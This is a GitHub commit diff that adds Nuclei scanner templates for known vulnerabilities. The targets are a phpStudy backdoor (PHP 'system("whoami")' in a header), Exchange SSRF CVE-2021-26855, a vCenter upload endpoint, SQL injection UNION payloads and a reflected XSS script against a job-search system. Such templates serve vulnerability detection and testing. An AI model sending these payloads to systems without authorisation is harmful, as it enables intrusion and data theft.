up nuclei-templates 2022-07-19 18:10:1658225444

GaoZzr · Jul 19, 2022 · f0c9ed1 · f0c9ed1
1 parent f1e11a5
commit f0c9ed1
Show file tree

Hide file tree

Showing 9 changed files with 199 additions and 25 deletions.
diff --git a/config/nuclei-templates/51pwn/CVE-2021-26855.yaml b/config/nuclei-templates/51pwn/CVE-2021-26855.yaml
diff --git a/config/nuclei-templates/51pwn/CheckCVE_2021_21972.yaml b/config/nuclei-templates/51pwn/CheckCVE_2021_21972.yaml
@@ -0,0 +1,31 @@
+id: CheckCVE_2021_21972
+info:
+  name: CheckCVE_2021_21972
+  author: 51pwn
+  severity: critical
+  reference:
+    - https://github.com/hktalent/nuclei-templates
+    - https://51pwn.com
+  tags: web,vcenter,RCE
+
+requests:
+  - raw:
+      - |+
+        GET //ui/vropspluginui/rest/services/uploadova HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Pragma:no-cache
+        Accept-Encoding:gzip, deflate
+        Connection: close
+        Content-Length: 0
+        
+      # end payload
+    unsafe: true
+    req-condition: true
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 405'
+
diff --git a/config/nuclei-templates/51pwn/PhpStudyDoor.yaml b/config/nuclei-templates/51pwn/PhpStudyDoor.yaml
@@ -0,0 +1,40 @@
+id: PhpStudyDoor
+info:
+  name: PhpStudyDoor
+  author: 51pwn
+  severity: critical
+  reference:
+    - https://github.com/hktalent/nuclei-templates
+    - https://51pwn.com
+  tags: web,go,debug
+
+# nuclei -duc -u http://localhost:9999 -t ./51pwn/checkGoDebug.yaml
+
+requests:
+  - raw:
+      - |+
+        GET {{Path}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Pragma:no-cache
+        Accept-Charset:{{base64(mypaths)}}
+        Accept-Encoding:gzip, deflate
+        Connection: close
+        Content-Length: 0
+        
+      # end payload
+    payloads:
+      mypaths:
+        - "echo '<result>'; system(\"whoami\");echo '</result>';"
+
+    attack: pitchfork 
+    unsafe: true
+
+    req-condition: true
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<result>(.*?)</result>'
diff --git a/config/nuclei-templates/51pwn/checkGoDebug.yaml b/config/nuclei-templates/51pwn/checkGoDebug.yaml
@@ -1,49 +1,44 @@
-id: check_go_debug_ui
+id: check_CVE-2021-26855
 info:
-  name: check_go_debug_ui
+  name: check_CVE-2021-26855
   author: 51pwn
   severity: critical
+  description: |+
+    https://saucer-man.com/information_security/748.html
   reference:
     - https://github.com/hktalent/nuclei-templates
     - https://51pwn.com
-  tags: web,go,debug
+  tags: web,go,microsoft,exchange,outlook
 
 # nuclei -duc -u http://localhost:9999 -t ./51pwn/checkGoDebug.yaml
 
 requests:
   - raw:
       - |+
-        GET /ui/{{mypaths}} HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
-        Accept:*/*
-        Pragma:no-cache
-        Accept-Encoding:gzip, deflate
+        POST /ecp/target.js HTTP/1.1
+        Host: {{Host}}
+        Accept-Encoding: gzip, deflate
+        Accept: */*
         Connection: close
-        Content-Length: 0
+        Cookie: X-BEResource=[name]@{{Host}}/autodiscover/autodiscover.xml?#~1941962754
+        Content-Type: text/xml
+
+        <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
+        <Request>
+        <EMailAddress>administrator@saucerman.com</EMailAddress>
+        <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
+        </Request>
+        </Autodiscover>
         
       # end payload
-    payloads:
-      mypaths:
-        - "top"
-        - "source"
-        - "flamegraph"
-
-    attack: pitchfork 
     unsafe: true
 
     req-condition: true
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: regex
-        part: body
-        regex:
-          - '<a[^>]+>(pprof|Top|Peek|Source|Disassemble)<\/a>'
       - type: word
         part: body
         words:
-          - 'Output annotated source for functions matching regexp'
-          - 'Output assembly listings annotated with samples'
-          - 'Display profile as a directed graph'
+          - 'Organization/ou=Exchange Administrative Group'
         condition: and
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-2187.yaml b/config/nuclei-templates/cves/2022/CVE-2022-2187.yaml
@@ -10,6 +10,11 @@ info:
     - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d
     - https://wordpress.org/plugins/contact-form-7-simple-recaptcha
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2187
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-2187
+    cwe-id: CWE-79
   tags: cve,cve2022,wordpress,xss,wp-plugin,wp
 
 requests:

diff --git a/config/nuclei-templates/cves/2022/CVE-2022-32007.yaml b/config/nuclei-templates/cves/2022/CVE-2022-32007.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-32007
+
+info:
+  name: Complete Online Job Search System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32007
+  metadata:
+    verified: true
+  tags: cve,cve2022,sqli,eris,authenticated
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user_email={{username}}&user_pass={{password}}&btnLogin=
+
+      - |
+        GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
diff --git a/config/nuclei-templates/cves/2022/CVE-2022-32018.yaml b/config/nuclei-templates/cves/2022/CVE-2022-32018.yaml
@@ -0,0 +1,28 @@
+id: CVE-2022-32018
+
+info:
+  name: Complete Online Job Search System v1.0 - SQL Injection
+  author: arafatansari
+  severity: high
+  description: |
+    Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=hiring&search=.
+  reference:
+    - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-32018
+  metadata:
+    verified: true
+  tags: cve,cve2022,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
diff --git a/config/nuclei-templates/vulnerabilities/other/eris-xss.yaml b/config/nuclei-templates/vulnerabilities/other/eris-xss.yaml
@@ -0,0 +1,38 @@
+id: eris-xss
+
+info:
+  name: Complete Online Job Search System v1.0 - Reflected Cross Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Complete Online Job Search System v1.0 is vulnerable to Reflected Cross Site Scripting via index.php?q=advancesearch.
+  metadata:
+    verified: true
+  tags: cve,cve2022,xss,eris
+
+requests:
+  - raw:
+      - |
+        POST /index.php?q=result&searchfor=advancesearch HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        SEARCH=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&COMPANY=&CATEGORY=&submit=Submit
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Result : <script>alert(document.domain)</script>'
+          - 'ERIS'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/go.mod b/go.mod
@@ -120,6 +120,7 @@ require (
 	go.mongodb.org/mongo-driver v1.9.1
 	golang.org/x/crypto v0.0.0-20220411220226-7b82a4e95df4
 	golang.org/x/oauth2 v0.0.0-20220411215720-9780585627b5
+	golang.org/x/time v0.0.0-20220411224347-583f2d630306
 	google.golang.org/genproto v0.0.0-20220602131408-e326c6e8e9c8
 	google.golang.org/protobuf v1.28.0
 	gorm.io/driver/sqlite v1.3.6
@@ -271,7 +272,6 @@ require (
 	golang.org/x/mod v0.4.2 // indirect
 	golang.org/x/sync v0.0.0-20210220032951-036812b2e83c // indirect
 	golang.org/x/term v0.0.0-20210927222741-03fcf44c2211 // indirect
-	golang.org/x/time v0.0.0-20220411224347-583f2d630306 // indirect
 	golang.org/x/tools v0.1.6-0.20210726203631-07bc1bf47fb2 // indirect
 	golang.org/x/xerrors v0.0.0-20220517211312-f3a8303e98df // indirect
 	google.golang.org/appengine v1.6.7 // indirect